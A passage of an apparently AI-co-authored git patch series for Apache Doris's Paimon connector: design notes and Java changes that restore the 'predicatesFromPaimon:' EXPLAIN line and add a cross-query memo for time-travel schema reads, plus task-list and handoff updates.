`PaimonScanNode.getNodeExplainString` (`PaimonScanNode.java:660-668`) printed the list of Paimon +`Predicate` objects **actually pushed to the Paimon SDK** (or ` NONE`): + +``` +predicatesFromPaimon: + + +``` + +The SPI scan path lost it. The connector's `appendExplainInfo` (`PaimonScanPlanProvider.java:1116-1129`) +emits only `paimonNativeReadSplits=` + the VERBOSE `PaimonSplitStats` block, and the generic node emits +`PREDICATES: ` (`PluginDrivenScanNode.java:270-275`) — the **Doris-level** conjuncts rendered as +SQL, NOT the SDK-converted Paimon predicates. So a silently-dropped conjunct (the converter drops what +it can't translate — LTZ / FLOAT / unsupported CAST) is no longer observable: `PREDICATES:` still lists +all conjuncts, but the pushed set is invisible. + +## Root Cause + +A pure missing-port: the legacy line was never re-emitted on the SPI path. The diagnostic gap matters +because `PaimonPredicateConverter.convert` **silently drops** unconvertible predicates +(`PaimonScanPlanProvider.java:573-578` builds the list; the converter null-skips), so +`predicatesFromPaimon:` can legitimately list fewer entries than `PREDICATES:` — that delta is exactly +what the line exists to surface. + +## Key lifecycle / seam facts (grounded) + +1. **The provider is re-instantiated per call.** `PaimonConnector.getScanPlanProvider():100-101` returns + `new PaimonScanPlanProvider(...)` each time, with **no shared instance state** between the SPI methods + (documented at `PaimonScanPlanProvider.java:168-169`). → A connector **field** cannot carry the + converted predicates from `getScanNodeProperties` to `appendExplainInfo`. Ruled out. +2. **The seam carries only a `Map`.** `ConnectorScanPlanProvider.appendExplainInfo(output, + prefix, nodeProperties)` — the filter/`ConnectorExpression` is NOT passed (it is available only at + `planScan`/`getScanNodeProperties` time). → Re-running the converter at explain time would require an + SPI signature change. Ruled out (keep connector-side, no SPI change). +3. **The pushed predicates are already serialized into the props.** `getScanNodeProperties:579` ALWAYS + emits `props.put("paimon.predicate", encodeObjectToString(predicates))` (even for the empty list — a + non-null base64 string; the JNI reader deserializes it unconditionally). `encodeObjectToString` + (`:1448`) = `InstantiationUtil.serializeObject` + Base64. +4. **`appendExplainInfo` receives those props.** The node does `explainProps = new HashMap<>(props)` + (`PluginDrivenScanNode.java:324`) where `props = getOrLoadScanNodeProperties()` (`:258`), then injects + the synthetic `__native_read_splits`/`__total_read_splits`/`__explain_verbose` keys + (`:325-328`, unconditional). So `paimon.predicate` is **always present** in `nodeProperties` during a + real EXPLAIN, and `InstantiationUtil.deserializeObject(byte[], ClassLoader)` is the symmetric inverse + (verified present in the SDK). +5. **Legacy ordering:** `super-body` → `paimonNativeReadSplits=/` → + `predicatesFromPaimon:[ NONE | …]` → `[VERBOSE] PaimonSplitStats:` (`PaimonScanNode.java:656-671`). + +## Design + +In the connector's `appendExplainInfo`, **deserialize the already-present `paimon.predicate` prop** back +to `List` and render the legacy `predicatesFromPaimon:` block, placed **between** the +`paimonNativeReadSplits=` line and the VERBOSE `PaimonSplitStats` block (exact legacy order). This reuses +the exact list pushed to BE — no re-conversion, no new prop, no redundant serialization, no SPI change, no field. + +```java +// inside the existing if (nativeSplits != null && totalSplits != null) block, +// AFTER the paimonNativeReadSplits= append, BEFORE the VERBOSE PaimonSplitStats block: +String encodedPredicates = nodeProperties.get("paimon.predicate"); +if (encodedPredicates != null) { + appendPredicatesFromPaimon(output, prefix, encodedPredicates); +} +``` + +Helper (new private static): + +```java +private static void appendPredicatesFromPaimon(StringBuilder output, String prefix, String encoded) { + List predicates; + try { + byte[] bytes = Base64.getDecoder().decode(encoded); + predicates = InstantiationUtil.deserializeObject( + bytes, org.apache.paimon.predicate.Predicate.class.getClassLoader()); + } catch (Exception e) { + // Diagnostic line only — never break EXPLAIN. The prop is produced by us, so a decode failure + // is a real bug; log + skip the line rather than render a misleading NONE. + LOG.warn("Failed to decode paimon.predicate for EXPLAIN predicatesFromPaimon", e); + return; + } + if (predicates == null) { + // unexpected payload — skip (do not render a misleading " NONE"); consistent with the catch path + return; + } + output.append(prefix).append("predicatesFromPaimon:"); + if (predicates.isEmpty()) { + output.append(" NONE\n"); + } else { + output.append("\n"); + for (org.apache.paimon.predicate.Predicate predicate : predicates) { + output.append(prefix).append(prefix).append(predicate).append("\n"); + } + } +} +``` + +### Why gate on `paimon.predicate != null` (skip when absent) + +`predicatesFromPaimon` renders iff the prop is present. In a real EXPLAIN it is always present (fact 3+4), +so this is full legacy parity. When absent (a unit test that injects only the synthetic keys, or another +connector's props) the line is skipped — which **preserves ALL existing exact-equality `appendExplainInfo` +tests** (none of them set `paimon.predicate`) and mirrors the existing "skip when keys absent" philosophy +of the `paimonNativeReadSplits=` line (`:1112-1114`). Absent ≠ empty-list, so skipping (not rendering +` NONE`) is the correct degenerate behavior. + +### Classloader + +Decode with `org.apache.paimon.predicate.Predicate.class.getClassLoader()` — the plugin classloader that +loaded the paimon SDK in the connector, guaranteed to have `Predicate` and its dependents. (Connector +code runs under that CL, so `Predicate.class` resolves there.) Avoids any reliance on the thread-context +classloader at explain time. + +### Why deserialize, not re-convert (deviates from the task-list's suggested mechanism) + +`task-list-P6-deviation-fixes.md` §A2 suggested "re-run `PaimonPredicateConverter` over the pushed +filter." That is not directly possible — the filter is not in the seam (fact 2). Deserializing the +already-serialized `paimon.predicate` is strictly better: same OUTPUT (the rendered pushed predicates), +but it renders **precisely what BE receives** (the serialized list is the source of truth), with the +smallest change (no SPI signature change, no new prop, no BE bloat). + +## Risk Analysis + +- **No correctness/perf/route impact** — diagnostic EXPLAIN text only. +- **Decode failure** never breaks EXPLAIN (try/catch → LOG.warn + skip the line). +- **No redundant serialization** — reuses the existing `paimon.predicate` blob instead of serializing the + same `List` into a second prop. (A new explain-only key would NOT have reached BE either: + `populateScanLevelParams:1078-1103` reads props key-by-key — only `paimon.predicate`/`options_json`/ + `schema_evolution` are set onto the thrift params, there is no bulk `putAll` — so the "BE bloat" worry + was unfounded; deserialize still wins on minimality.) +- **Backward-compat** — existing exact-equality explain tests keep passing (line skipped when prop absent). +- **toString / render-format parity** — this renders the set the **SPI path actually pushes to BE** (the + source of truth), NOT a re-derivation of legacy's fe-core converter output. Both converters emit the same + `org.apache.paimon.predicate.Predicate` class, so `Predicate.toString()` parity holds; the + serialize→deserialize round-trip is lossless (toString is field-derived); the surrounding format (label, + ` NONE`, double-prefix indent, newlines) is reproduced verbatim from `PaimonScanNode.java:660-668`. +- **Ordering** — inserted between `paimonNativeReadSplits=` and the VERBOSE block = exact legacy order. + +## Test Plan + +### Unit Tests (fe-connector-paimon, add to `PaimonScanExplainTest`) + +Build the `paimon.predicate` prop exactly as production does (`InstantiationUtil.serializeObject` + +`Base64`), inject alongside the synthetic split keys, call `appendExplainInfo`, assert the rendered text. + +1. **Non-empty pushed predicates** — build `List` via paimon `PredicateBuilder` + (e.g. `equal(0, 5)` over a 1-col RowType), serialize into `paimon.predicate`, set + `__native_read_splits`/`__total_read_splits`. Assert output contains, in order, + `paimonNativeReadSplits=…\n` then `predicatesFromPaimon:\n` then `\n` + (expected predicate text computed from `p.toString()`, not hardcoded). **RED before:** the line is + absent. +2. **Empty pushed predicates** — serialize `Collections.emptyList()` into `paimon.predicate`. Assert + output contains `predicatesFromPaimon: NONE\n`. +3. **Ordering** — assert `indexOf("paimonNativeReadSplits=") < indexOf("predicatesFromPaimon:")` and, + under VERBOSE (`__explain_verbose=true`), `indexOf("predicatesFromPaimon:") < indexOf("PaimonSplitStats:")`. +4. **Backward-compat (existing tests, unchanged)** — all existing exact-equality `appendExplainInfo` tests + (none set `paimon.predicate`) must still pass byte-for-byte (line skipped when prop absent). +5. **Absent → skip (new dedicated guard)** — `appendExplainInfoSkipsPredicatesFromPaimonWhenPropAbsent`: + set only `__native_read_splits`/`__total_read_splits` (NO `paimon.predicate`), assert output contains + `paimonNativeReadSplits=` AND does NOT contain `predicatesFromPaimon` — positively pins the + absent ≠ empty contract (mirrors the sibling `…SkipsWhenSyntheticKeysAbsent` guard). + +### E2E Tests + +None added. Existing paimon regression suites that assert EXPLAIN are gated (`enablePaimonTest=false`). +The connector UT pins the rendered string; a live e2e is not warranted for a diagnostic line. + +## Build / Verify + +- `mvn -f .../fe/pom.xml -pl :fe-connector-paimon -am package -Dassembly.skipAssembly=true + -Dmaven.build.cache.enabled=false -DfailIfNoTests=false` (checkstyle in `validate`). +- `tools/check-connector-imports.sh` exit 0 (no fe-core import; only paimon SDK + java.util). +- RED→GREEN: new non-empty test fails before the fix (line absent), passes after. diff --git a/plan-doc/designs/FIX-A2-PREDICATES-FROM-PAIMON-summary.md b/plan-doc/designs/FIX-A2-PREDICATES-FROM-PAIMON-summary.md new file mode 100644 index 00000000000000..04b1fedf1d87cd --- /dev/null +++ b/plan-doc/designs/FIX-A2-PREDICATES-FROM-PAIMON-summary.md @@ -0,0 +1,65 @@ +# FIX-A2 — re-emit the legacy `predicatesFromPaimon:` EXPLAIN line — SUMMARY + +> P6 deviation→fix (2 of 5). Severity MINOR (diagnostic-only). Design + design red-team +> (`wf_c67cb558-ff4`, 13 candidates → 0 actionable on code; folded doc/test refinements) + RED→GREEN UT +> + impl-verify (APPROVE, with its own mutation check). + +## Problem + +Legacy `PaimonScanNode.getNodeExplainString` (`PaimonScanNode.java:660-668`) printed the Paimon +`Predicate` objects actually pushed to the SDK (or ` NONE`): + +``` +predicatesFromPaimon: + +``` + +The SPI scan path lost it. The connector's `appendExplainInfo` emitted only `paimonNativeReadSplits=` + +VERBOSE `PaimonSplitStats`; the generic node emits `PREDICATES: ` (the Doris-level conjuncts), NOT +the SDK-converted set. So a silently-dropped conjunct (the converter drops LTZ / FLOAT / unsupported CAST) +was no longer observable. + +## Root Cause + +Pure missing-port. The diagnostic value is the delta between `PREDICATES:` (all conjuncts) and +`predicatesFromPaimon:` (the pushed subset), which `PaimonPredicateConverter.convert` narrows by silently +null-skipping unconvertible predicates. + +## Fix + +In the connector's `appendExplainInfo`, **deserialize the already-present `paimon.predicate` prop** (the +exact `List` pushed to BE — `getScanNodeProperties:579` always emits it via +`InstantiationUtil.serializeObject` + Base64) and render the legacy block, placed **between** the +`paimonNativeReadSplits=` line and the VERBOSE `PaimonSplitStats` block (exact legacy order +`PaimonScanNode:657-671`). New private helper `appendPredicatesFromPaimon`. + +Chosen over the task-list's suggested "re-run the converter" because the filter is not in the SPI seam +(it carries only the props map) and the provider is re-instantiated per call (no field). Deserializing +the existing prop renders precisely what BE receives, with the smallest change: no SPI signature change, +no new prop, no redundant serialization, no field, no BE impact (`populateScanLevelParams` reads props +key-by-key, so an unread key would not reach BE anyway). + +Robustness: gated on `paimon.predicate != null` (absent ≠ empty → skip, preserving the existing +exact-equality explain tests); decode failure → `LOG.warn` + skip (never breaks EXPLAIN); null +deserialized list → skip before the label. Decode with `Predicate.class.getClassLoader()` (the plugin CL, +TCCL-independent). + +## Tests + +4 new tests in `PaimonScanExplainTest` (build `paimon.predicate` exactly as production does — +`InstantiationUtil.serializeObject` + Base64): +1. **Non-empty pushed predicate** — exact-equality incl. double-prefix indent (RED before: line absent). +2. **Empty list → `predicatesFromPaimon: NONE`** (RED before). +3. **Ordering** — `paimonNativeReadSplits < predicatesFromPaimon < PaimonSplitStats` under VERBOSE (RED before). +4. **Absent prop → skip** (mirrors the sibling synthetic-keys-absent guard; pins absent ≠ empty; green + pre-fix — pins the contract that keeps the existing exact-equality tests green). + +## Result + +- RED→GREEN by separate runs: unfixed → 3 failures (tests 1-3); fixed → `PaimonScanExplainTest` **17/0/0**. +- Full paimon module: **287 run / 0 failures / 0 errors / 1 skipped** (gated e2e); checkstyle 0; + `tools/check-connector-imports.sh` exit 0. +- Design red-team: design sound + legacy-faithful, no BLOCKER/MAJOR; folded refinements (corrected the + "no BE bloat" rationale → "no redundant serialization"; null→skip before label; added the absent→skip + test; doc wording). Impl-verify: **APPROVE** (ran its own neuter → 3 tests RED, then restored). +- e2e gated (`enablePaimonTest=false`) — NOT run (no regression suite asserts this line). diff --git a/plan-doc/task-list-P6-deviation-fixes.md b/plan-doc/task-list-P6-deviation-fixes.md index ea717dec6a64cc..13fe122937ea96 100644 --- a/plan-doc/task-list-P6-deviation-fixes.md +++ b/plan-doc/task-list-P6-deviation-fixes.md @@ -41,7 +41,12 @@ A3 → A2 → B-MC2 → A1 → B-R2-be ## A2 — EXPLAIN drops legacy `predicatesFromPaimon:` line (MINOR / missing-port) -- [ ] **A2** +- [x] **A2** — DONE. `appendExplainInfo` deserializes the already-present `paimon.predicate` prop (the + exact pushed `List`) and renders the legacy block between `paimonNativeReadSplits=` and the + VERBOSE `PaimonSplitStats` (legacy order `PaimonScanNode:657-671`); chosen over re-converting (filter + not in the seam, provider re-instantiated per call). 4 new `PaimonScanExplainTest` (RED→GREEN by + separate runs: 3 fail unfixed → 0); 287/0/0/1skip, checkstyle 0, import-check 0; design red-team + 0-actionable, impl-verify APPROVE. See `designs/FIX-A2-PREDICATES-FROM-PAIMON-{design,summary}.md`. - **Finding:** report §R2 (scan). Legacy `PaimonScanNode:660-668` listed the converted Paimon `Predicate` objects actually pushed to the SDK (or ` NONE`). The SPI `appendExplainInfo:1117` emits only generic `PREDICATES:` + `paimonNativeReadSplits=` + VERBOSE `PaimonSplitStats`, so a silently-dropped LTZ/FLOAT/CAST conjunct is no longer From 0ed5bd497700f2c6c376b7fd40d17ef11480b622 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 14:02:53 +0800 Subject: [PATCH 114/128] =?UTF-8?q?docs(catalog-spi):=20P6=20A2=20(predica?= =?UTF-8?q?tesFromPaimon)=20fix=20done=20=E2=86=92=20HANDOFF=20next=20=3D?= =?UTF-8?q?=20B-MC2?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 22 ++++++++++++++++------ 1 file changed, 16 insertions(+), 6 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 0dfd7278e9f3f9..6277bed5478436 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -6,7 +6,7 @@ --- -# 🎯 下一个 session 的任务 — **A2(EXPLAIN 重发 `predicatesFromPaimon:`)→ 见 `task-list-P6-deviation-fixes.md`**(5 个 deviation→fix:**A3 ✅ 已完成 `5fa47c27eb8`**,剩 A2 / B-MC2 / A1 / B-R2-be,逐一修) +# 🎯 下一个 session 的任务 — **B-MC2(time-travel schema 二级缓存 memo,⚠️ NO PERF REGRESSION)→ 见 `task-list-P6-deviation-fixes.md`**(5 个 deviation→fix:**A3 ✅ `5fa47c27eb8` / A2 ✅ `1935748d6c3` 已完成**,剩 B-MC2 / A1 / B-R2-be,逐一修) > **进度(2026-06-19)**:P6 发现项按 `task-list-P6-fixes.md` 的 prioritized list 逐个修(单任务循环: > design → 红队 → 实现 → impl 验证 → build+UT → commit)。 @@ -18,6 +18,13 @@ > **RED→GREEN 两次独立跑验证**:未修代码 weight-0 测失败 1,修后 3/0);283/0/0/1skip + checkstyle0 + import0;design 红队 > `wf_3f2cd605-2a8`(9 候选→0-actionable on code)、impl-verify **APPROVE**;e2e gated 未跑。详见 > `designs/FIX-A3-SELF-SPLIT-WEIGHT-{design,summary}.md`。 +> **✅ A2 (MINOR, missing-port, deviation 2/5) `1935748d6c3`**:`appendExplainInfo` 反序列化已在 props 里的 +> `paimon.predicate`(即推给 SDK 的 `List`)重发 legacy `predicatesFromPaimon:` 块,置于 +> `paimonNativeReadSplits=` 与 VERBOSE `PaimonSplitStats` 之间(legacy 序 `PaimonScanNode:657-671`)。不重跑 converter +> (filter 不在 seam、provider 每次新建);absent≠empty 跳过(保 exact-equality 旧测);decode 失败 LOG.warn+跳过; +> 不改 SPI、无 BE 影响(`populateScanLevelParams` 逐键读,新键也到不了 BE)。4 新 `PaimonScanExplainTest`(**RED→GREEN +> 分跑**:未修 3 失→修后 0);287/0/0/1skip + checkstyle0 + import0;design 红队 `wf_c67cb558-ff4`(13 候选→0-actionable +> on code,已折叠文档/测试细化)、impl-verify APPROVE。详见 `designs/FIX-A2-PREDICATES-FROM-PAIMON-{design,summary}.md`。 > **✅ R3-residual (MINOR) 已完成**:去 `PluginDrivenScanNode.getNodeExplainString` 的 `"paimon".equals(getType())` > gate,VERBOSE backends 块改无条件 emit(gate 变 `VERBOSE && !isBatchMode()`,与父 `FileScanNode` 完全一致)+ 重写假注释。 > **红队纠正了 scope**(比 review 的「maxcompute」更广):`SPI_READY_TYPES={jdbc,es,trino-connector,max_compute,paimon}` 全走 @@ -43,8 +50,8 @@ > `PaimonMetadataOps:340` 完全一致(且所有其它连接器都 propagate),原先吞成 emptyList 且注释谎称 parity。280/0 paimon(+1 > gated skip)+16/0+3/0+14/0+12/0;fe-core 编译过;checkstyle 0;import-check 干净;design+impl 两道红队均 0-actionable;e2e gated。 > 详见 `designs/FIX-C4-R2-R3-CATALOG-{design,summary}.md`(design 红队 `wf_444e33b9-5c6`、impl 红队 `wf_b3d35e64-6b9`)。 -> **下一个 = A2(A3 已完成 `5fa47c27eb8`);剩 4 个 deviation→fix(用户决定修,非接受)**:逐一走单任务循环 -> (详单见 **`task-list-P6-deviation-fixes.md`**,剩余建议序 A2→B-MC2→A1→B-R2-be):**A1** 插件 split 比例权重 +> **下一个 = B-MC2(A3 `5fa47c27eb8` / A2 `1935748d6c3` 已完成);剩 3 个 deviation→fix(用户决定修,非接受)**:逐一走单任务循环 +> (详单见 **`task-list-P6-deviation-fixes.md`**,剩余建议序 B-MC2→A1→B-R2-be):**A1** 插件 split 比例权重 > (SPI `ConnectorScanRange` 加 `getSelfSplitWeight/getTargetSplitSize` + `PluginDrivenSplit` ctor 回填,连接器已算好只是没传 FE > FileSplit);**A2** 重发 EXPLAIN `predicatesFromPaimon:`(连接器 `appendExplainInfo` 重转 filter);**A3** 去 > `paimon.self_split_weight` 的 `>0` 闸(weight=0 也发,profile parity);**B-R2-be** schema-evolution 字典收窄到 @@ -104,8 +111,11 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 - ✅ **A3**(NIT profile-parity)— **DONE `5fa47c27eb8`**:`PaimonScanRange` ctor `self_split_weight` 闸 `>0`→ `paimonSplit != null`(emit-iff-JNI = legacy `PaimonScanNode:274` parity);weight-0 JNI 现发 0;新 UT 3 RED→GREEN; 283/0/0/1skip。详见 `designs/FIX-A3-SELF-SPLIT-WEIGHT-{design,summary}.md`。 - - **剩 4 个 deviation→fix(下一个 = A2,用户决定修)**:A2 + B-MC2 + A1 + B-R2-be,逐一走单任务循环。完整详单(机制/ - 修法/文件/**两个 B 项的无回退论证**/测试意图)见 **`task-list-P6-deviation-fixes.md`**。建议序 A2→B-MC2→A1→B-R2-be。 + - ✅ **A2**(MINOR missing-port)— **DONE `1935748d6c3`**:`appendExplainInfo` 反序列化 `paimon.predicate` 重发 legacy + `predicatesFromPaimon:`(置于 `paimonNativeReadSplits=` 与 VERBOSE `PaimonSplitStats` 间,legacy 序);不重跑 converter; + 4 新 UT RED→GREEN;287/0/0/1skip。详见 `designs/FIX-A2-PREDICATES-FROM-PAIMON-{design,summary}.md`。 + - **剩 3 个 deviation→fix(下一个 = B-MC2,用户决定修)**:B-MC2 + A1 + B-R2-be,逐一走单任务循环。完整详单(机制/ + 修法/文件/**两个 B 项的无回退论证**/测试意图)见 **`task-list-P6-deviation-fixes.md`**。建议序 B-MC2→A1→B-R2-be。 - **P6-DEVIATIONS 余项(5 项之后,本批最后一项)**:未转 fix 的剩余 MINOR/NIT 刻意偏离 + wave2 新增 + `PluginDrivenExternalCatalog:140` 吞 authenticator-wiring 异常(R3/R4/R5/R6 residual 属 B8 清理、2 BLOCKER 属 B8 护栏, 均不在此)。逐条记入新建 `deviations-log.md` accept-as-deviation(含用户签字)。 @@ -131,7 +141,7 @@ paimon connector 全功能路径 clean-room 对抗 review(6 维度 + 7 缺口 --- # 📦 仓库 / 进度状态 -- **HEAD = `5fa47c27eb8`**(FIX-A3 self_split_weight;前序 `82b6de0de98` C4/R2/R3、`f652b40d210` R1-table、`44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); +- **HEAD = `1935748d6c3`**(FIX-A2 predicatesFromPaimon;前序 `5fa47c27eb8` A3、`82b6de0de98` C4/R2/R3、`f652b40d210` R1-table、`44499f073e8` R3-residual、`e95128aed5b` C2 HDFS XML、`9967846ef64` C1 MinIO)。当前分支 **`catalog-spi-07-paimon`**(非 master); remote `master-catalog-spi-07-paimon`(= PR [#64445](https://github.com/apache/doris/pull/64445) head)仍在 `82b6de0de98`, **本地领先:A3 起的 deviation fix commits 尚未 push** → 待本批 deviation fix 做完,session 收尾一次性 force-with-lease push + PR 评论 `run buildall`(见 §Commit 须知 / memory `catalog-spi-07-paimon-branch-pr-workflow`)。 From 10284edbf887d3e82ccd0d1ccbbdac16cf1fbca0 Mon Sep 17 00:00:00 2001 From: morningman Date: Fri, 19 Jun 2026 15:15:01 +0800 Subject: [PATCH 115/128] =?UTF-8?q?fix:=20FIX-B-MC2=20=E2=80=94=20memoize?= =?UTF-8?q?=20time-travel=20schema-at-snapshot=20read=20across=20queries?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause: time-travel reads (FOR VERSION/TIME AS OF, @tag, @branch) called catalogOps.schemaAt(table, schemaId) — a paimon schemaManager().schema(id) schema-file read — on EVERY query, pinning the result only to the per-statement PluginDrivenMvccSnapshot. PaimonConnector.getMetadata() returns a fresh metadata per query, so nothing persisted the at-snapshot schema across queries. Legacy served it from the catalog-level PaimonExternalMetaCache keyed by (NameMapping, schemaId); the SPI cutover (CACHE-P1) dropped that second-level cache. Fix: connector-side immutable bounded memo of the schemaAt read. - New PaimonSchemaAtMemo: ConcurrentHashMap; getOrLoad does get -> (miss) loader OUTSIDE any lock -> putIfAbsent, with a best-effort clear-on-overflow bound. MemoKey = extracted handle identity (db,table,sysName,branch) + schemaId, mirroring PaimonTableHandle.equals/hashCode (extracted, not a retained handle, so the loaded paimon Table is not pinned in the cache). - PaimonConnector owns the memo (per-catalog, long-lived; rebuilt -> empty on REFRESH via onClose connector=null) and injects it into each per-query metadata through a new package-private 4-arg ctor; the public 3-arg ctor delegates with a fresh per-instance memo so the ~15 existing construction sites are unchanged. - getTableSchema(snapshot), schemaId>=0 branch only (the <0 latest fallback is untouched): resolveTable runs ONCE outside the loader (a branch handle's getTable stays 1/query), the memo wraps ONLY the schemaAt read, and ConnectorTableSchema is rebuilt fresh per query so the live coreOptions/properties stay current. Memoizing the built ConnectorTableSchema would cache the live coreOptions under a schemaId key and could serve stale PROPERTIES (red-team MAJOR) — so only the raw PaimonSchemaSnapshot (a pure function of the key) is cached. No perf regression (hard constraint): the cached value is a pure function of the key (a committed schemaId's schema is write-once); the latest path never builds a key; worst case (miss / eviction / concurrent double-load) = the pre-fix per-query load. The only behavioral delta is "the schemaAt read is skipped on a repeat". Tests: +3 PaimonConnectorMetadataMvccTest (cross-query hit / schemaId-keyed / branch-keyed) and new PaimonSchemaAtMemoTest (dedup / sysName-keyed / overflow-re-read); each RED-verified by a separate mutation run (memo-disabled, key-drops-fields, bound-disabled). Full paimon module 293/0/0/1skip, checkstyle 0, check-connector-imports 0. e2e gated (enablePaimonTest=false) NOT run. Design + summary: plan-doc/designs/FIX-B-MC2-SCHEMA-AT-MEMO-{design,summary}.md (design red-team wf_903bf4e9-3a4, impl-verify wf_67804f35-d5e). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../connector/paimon/PaimonConnector.java | 9 +- .../paimon/PaimonConnectorMetadata.java | 20 +- .../connector/paimon/PaimonSchemaAtMemo.java | 138 ++++++++++ .../PaimonConnectorMetadataMvccTest.java | 106 ++++++++ .../paimon/PaimonSchemaAtMemoTest.java | 117 ++++++++ .../FIX-B-MC2-SCHEMA-AT-MEMO-design.md | 249 ++++++++++++++++++ .../FIX-B-MC2-SCHEMA-AT-MEMO-summary.md | 74 ++++++ 7 files changed, 711 insertions(+), 2 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonSchemaAtMemo.java create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonSchemaAtMemoTest.java create mode 100644 plan-doc/designs/FIX-B-MC2-SCHEMA-AT-MEMO-design.md create mode 100644 plan-doc/designs/FIX-B-MC2-SCHEMA-AT-MEMO-summary.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index 76b8760577b7f9..c8916a9907ef57 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -85,6 +85,12 @@ public class PaimonConnector implements Connector { private final ConnectorContext context; private volatile Catalog catalog; + // FIX-B-MC2: connector-level (per-catalog, long-lived) second-level memo for the time-travel + // schema-at-snapshot read. getMetadata() returns a FRESH metadata per query, so this must live on the + // connector (not the metadata) to give the cross-query hit the legacy PaimonExternalMetaCache provided. + // Cleared wholesale on REFRESH CATALOG (the connector is rebuilt). See PaimonSchemaAtMemo. + private final PaimonSchemaAtMemo schemaAtMemo = new PaimonSchemaAtMemo(PaimonSchemaAtMemo.DEFAULT_MAX_SIZE); + public PaimonConnector(Map properties, ConnectorContext context) { this.properties = properties; this.context = context; @@ -93,7 +99,8 @@ public PaimonConnector(Map properties, ConnectorContext context) @Override public ConnectorMetadata getMetadata(ConnectorSession session) { return new PaimonConnectorMetadata( - new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(ensureCatalog()), properties, context); + new PaimonCatalogOps.CatalogBackedPaimonCatalogOps(ensureCatalog()), properties, context, + schemaAtMemo); } @Override diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java index 3417790328472e..18141f5465393e 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnectorMetadata.java @@ -83,12 +83,24 @@ public class PaimonConnectorMetadata implements ConnectorMetadata { // directly-injected map avoids depending on the session being populated and is simpler. private final Map catalogProperties; + // FIX-B-MC2: time-travel schema-at-snapshot memo. Injected by PaimonConnector (the per-catalog, + // long-lived owner) so the at-snapshot resolve hits across queries. The public 3-arg ctor gives each + // metadata its OWN fresh memo (no cross-query benefit, but correct) so the ~15 existing construction + // sites compile unchanged; production goes through the 4-arg ctor with the connector-shared memo. + private final PaimonSchemaAtMemo schemaAtMemo; + public PaimonConnectorMetadata(PaimonCatalogOps catalogOps, Map properties, ConnectorContext context) { + this(catalogOps, properties, context, new PaimonSchemaAtMemo(PaimonSchemaAtMemo.DEFAULT_MAX_SIZE)); + } + + PaimonConnectorMetadata(PaimonCatalogOps catalogOps, Map properties, + ConnectorContext context, PaimonSchemaAtMemo schemaAtMemo) { this.catalogOps = catalogOps; this.typeMappingOptions = buildTypeMappingOptions(properties); this.context = context; this.catalogProperties = properties; + this.schemaAtMemo = schemaAtMemo; } @Override @@ -217,9 +229,15 @@ public ConnectorTableSchema getTableSchema( return getTableSchema(session, handle); } PaimonTableHandle paimonHandle = (PaimonTableHandle) handle; + long schemaId = snapshot.getSchemaId(); Table table = resolveTable(paimonHandle); + // FIX-B-MC2: memoize the schemaAt schema-file read across queries. resolveTable + buildTableSchema + // still run every query (keeping the live coreOptions/properties current); only the schemaAt + // round-trip is skipped on a repeat. The memo is keyed by (handle-identity, schemaId) — a pure + // function — and owned by the per-catalog PaimonConnector. resolveTable runs ONCE, outside the + // loader, so a branch handle's getTable reload happens at most once per query (= the pre-fix path). PaimonCatalogOps.PaimonSchemaSnapshot schema = - catalogOps.schemaAt(table, snapshot.getSchemaId()); + schemaAtMemo.getOrLoad(paimonHandle, schemaId, () -> catalogOps.schemaAt(table, schemaId)); return buildTableSchema( paimonHandle.getTableName(), table, diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonSchemaAtMemo.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonSchemaAtMemo.java new file mode 100644 index 00000000000000..4b7e6ca743029b --- /dev/null +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonSchemaAtMemo.java @@ -0,0 +1,138 @@ +// Licensed to the Apache Software Foundation (ASF) under one +// or more contributor license agreements. See the NOTICE file +// distributed with this work for additional information +// regarding copyright ownership. The ASF licenses this file +// to you under the Apache License, Version 2.0 (the +// "License"); you may not use this file except in compliance +// with the License. You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, +// software distributed under the License is distributed on an +// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY +// KIND, either express or implied. See the License for the +// specific language governing permissions and limitations +// under the License. + +package org.apache.doris.connector.paimon; + +import java.util.Map; +import java.util.Objects; +import java.util.concurrent.ConcurrentHashMap; +import java.util.function.Supplier; + +/** + * Second-level memo for the time-travel schema-at-snapshot read (FIX-B-MC2). Restores the cross-query + * cache hit that the legacy catalog-level {@code PaimonExternalMetaCache} (keyed by + * {@code (NameMapping, schemaId)}) provided and that the SPI cutover dropped (review tag CACHE-P1). + * + *

